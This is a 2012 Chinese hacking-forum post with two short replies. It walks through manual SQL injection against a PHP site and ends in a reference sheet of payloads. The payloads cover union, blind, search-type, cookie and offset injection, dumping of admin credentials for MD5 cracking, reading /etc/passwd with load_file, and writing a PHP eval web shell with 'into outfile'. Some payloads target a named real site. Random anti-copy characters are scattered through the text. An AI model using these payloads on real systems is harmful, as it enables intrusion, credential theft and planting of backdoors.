找回密码
 立即注册
查看: 3732|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~! [, l% n! K9 n3 U
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
8 }- H% X3 Y% O9 i; c我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。2 o( {! f/ E# n2 `* e3 y) Q
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
1 F4 `8 Y. i5 A9 o) a1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)$ a# P: t$ y9 p- l
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:3 X1 V4 ]; d8 h* f/ _3 u6 d
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in8 j( I; s* R' X8 E4 Q
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
, ?$ c3 Y+ i; Y5 w+ Q/ T. w" a: b                        
+ o) G! J# y8 u2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,# A) `. O; ~  i) n. f5 d9 ^
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
9 N1 H8 C  L; R/ m. \4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息; L2 [' j5 W9 t; p8 v  J  ?
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
+ J5 W3 ~4 G/ b7 w有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
3 ~- I6 `5 P' e( i8 ?; O7 b2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
# U; V* O& Y, q1 V. A2 r我就用的是第二个思路,/ ]) G5 I2 Q# [, O; F! S2 h
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
4 a" Y/ }% c9 [6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
/ C% r/ d: D2 N, g; R提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
# e( u( R4 {5 d; R+ w注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
/ X" w5 U- i* h$ J0 p7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????$ f  L7 |1 [1 N& L
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
( j5 R! W8 i2 L提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
1 s& @( j* S1 `2 s. z4 k; }然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
9 o/ c# x, v1 Z9 f5 {) _9 c' ]调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
# ^; q6 y8 X: v. @7 S) X" G0 u下面是一些很普遍注入方式资料:
2 O+ z/ A- D1 o7 T& j/ m9 a7 n注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
' Z9 E& `& s9 c7 h( k& H( l8 m& ~拆半法
( ?$ {: y5 C9 y######################################) H& q- K8 N/ Y9 F
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。# d9 }! i- w6 I/ g2 l' c; u
and exists (select * from admin)
; Y" m* Q5 Y4 F( c) R+ `3 pand exists(select id from admin)
  v# d* p  f# B" q  Y5 h- B7 ~6 Wand exists(select id from admin where id=1)
8 F3 ~: T( b9 G$ C8 Land exists(select id from admin where id>1)   o3 Q, I9 M" m
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 ) k5 K/ d% {- b( D' j0 ~
and exists (select username from admin)
" C, m5 y' j; A4 l5 N3 tand exists (select password from admin)
8 L1 i8 w8 t, a0 h* w$ s3 V' {% jand exists (select id from admin where len(username)<10 and id=1)
* A' f0 m; _/ @6 F9 \and exists (select id from admin where len(username)>5 and id=1)
/ a5 k1 Q& B7 T1 w! ^. }1 _  Jand exists (select id from admin where len(username)=6 and id=1)
& N% r9 j4 Y# I$ U  p2 P( i+ Sand exists (select id from admin where len(password)<10 and id=1)
' l: C. t2 o& ^& m  P# [and exists (select id from admin where len(password)>5 and id=1), ?  ?4 o; u/ u$ |- d8 V
and exists (select id from admin where len(password)=7 and id=1)
$ Q7 a# l9 T. x, B2 O9 {5 P4 Land (select top 1 asc(mid(username,1,1)) from admin)=97
' F( V& u/ W! ]2 a- c/ c返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。( a' k! {" X0 ^5 Z
猜第二位把username,1,1改成username,2,1就可以了。& A9 ^8 i& Q$ K  s
猜密码把username改成password就OK了
6 f0 P! L" W: \% \# l##################################################
8 \) v2 z1 I* J0 g搜索型注入
) V) G6 \$ ~, h; b; m7 U# D3 M0 f##################################. r+ w* i! L9 r% Q! E
%' and 1=1 and '%'='8 H4 x5 ]! ]  s/ M5 ?( ?
%' and exists (select * from admin) and '%'='
4 ^0 P9 Z1 u* x%' and exists(select id from admin where id=1) and '%'='
# e2 @1 {1 P# e( O3 H( s%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
# V9 `" \1 F; ^, I  ^4 O* d%' and exists (select id from admin where len(password)=7 and id=1) and '%'='2 m4 z# r/ A( J$ [- ?8 j! z
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='7 @* h+ U) N% b8 [
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
2 p2 _" F. \" f  h对于MSSQL数据库,后面可以吧 and '%'='换成--7 j9 ?% x0 n8 [/ A# l, V
还有一点搜索型注入也可以使用union语句。
6 t- \* P$ H: ?2 ?' t########################################################
( N$ F" A5 N0 h联合查询。2 c( W3 V. k0 ], p# R, Z
#####################################
+ u6 X2 ^  F* {9 Oorder by 10- {: p2 l' B3 D" ~7 u3 A
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
4 L+ X! D4 W; }/ `# T* [5 [and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin) P8 @6 A. h% B4 P' {% N. x- {- r
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1/ K2 X) D( k. c1 ^& [8 {0 E
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
7 N$ _1 i) P; P) y8 M/ _& Z' o- f###################################
/ {/ Q6 m) I9 D7 o3 Qcookie注入- G: S" V( p  u- p* m, l# `
###############################& H1 s" P7 F& ~. k  Z
http://www.******.com/shownews.asp?id=127
" i8 j3 {9 M, W3 ~http://www.******.com/shownews.asp/ R& I7 X2 A+ E" t2 F" v! z, \
alert(="id="+escape("127"));9 j2 T9 G4 c) i# Y
alert(="id="+escape("127 and 1=1"));1 V# ]- c8 }; E1 Y
alert(="id="+escape("127 order by 10"));! X0 x# B0 z) [( A* e( Z
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
( m1 b# M' A3 A8 k$ f* n- Valert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));/ G/ ~" M( {) A/ g
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
( ^8 x( y3 z+ _6 l2 Q9 [###################################
% T9 V) z2 A. K6 F3 P偏移注入
, P! i0 y' \' s5 g7 t###########################################################7 F) \: ^/ c" N1 ]. z$ ^/ f6 X
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin9 ~8 ?* H; t: o6 n  M# G6 D
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
- |3 ~. t# ]6 k+ [7 `union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)9 {0 O' o7 V! p) |( t! l# B
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
. N! o  s6 f+ D% w& Lunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
3 Q" Y+ v- ]( l# {union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)7 A" m6 n4 U& h" M: \
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on0 \" J7 }" |* p) f8 {" p6 P! F
a.id=d.id)
2 F3 V* x, D8 `. c0 oand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)4 r$ \5 e& Y: v1 T8 m( ^) `
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
9 j5 C4 q; \  p( K  
( _4 P5 u( Y- T# l============================================================================================================
0 L( ]; t! B( f5 T% W3 F( n1.判断版本$ ~3 N4 n* @. H1 g8 r3 J  ^
and ord(mid(version(),1,1))>51
* P2 |9 z; D4 a2 {3 E# F: }7 d返回正常,说明大于4.0版本,支持ounion查询
9 u& q: z% D' X  ]; l% B8 U- M  b1 M2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解0 a% ^3 R+ x3 Z' f
and 2=4 union select 1,2,3,4,5,6,7,8,9--0 p& H$ B! O7 B$ y# G/ y) x
3.查看数据库版本及当前用户,2 S% @2 I/ R  j3 w9 ]- C0 ?8 w
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--8 p1 }: \/ Y; o7 s
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,+ F3 Q8 a3 j. t- y1 v
4.判断有没有写权限
2 ?7 n8 l/ w5 {2 Land (select count(*) from MySQL.user)>0-- & L4 ]* a+ K" ~! X
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1: X, q' D2 `( @6 D1 p7 O  d+ \
用不了这个命令,就学习土耳其黑客手法,如下
; O% @% L( Y/ q1 B% ], q1 Zand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--8 l' Z) s" F; o, x6 Q
6.爆表,爆库
9 ?! s9 T7 ^9 Q# w' zand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--$ A2 M. |, I3 M& r
7.爆列名,爆表5 a+ L8 g8 U; z% U. B
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
; v! d$ ?4 f9 Y8.查询字段数,直接用limit N,1去查询,直接N到报错为止。/ ?- y5 [/ @$ t3 v" M+ l) j: F
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
- a3 ~" n: Q8 c) P) ?9.爆字段内容# T1 E) M' u% f% d
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--' j# g4 i8 G7 h. Y% N& B
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表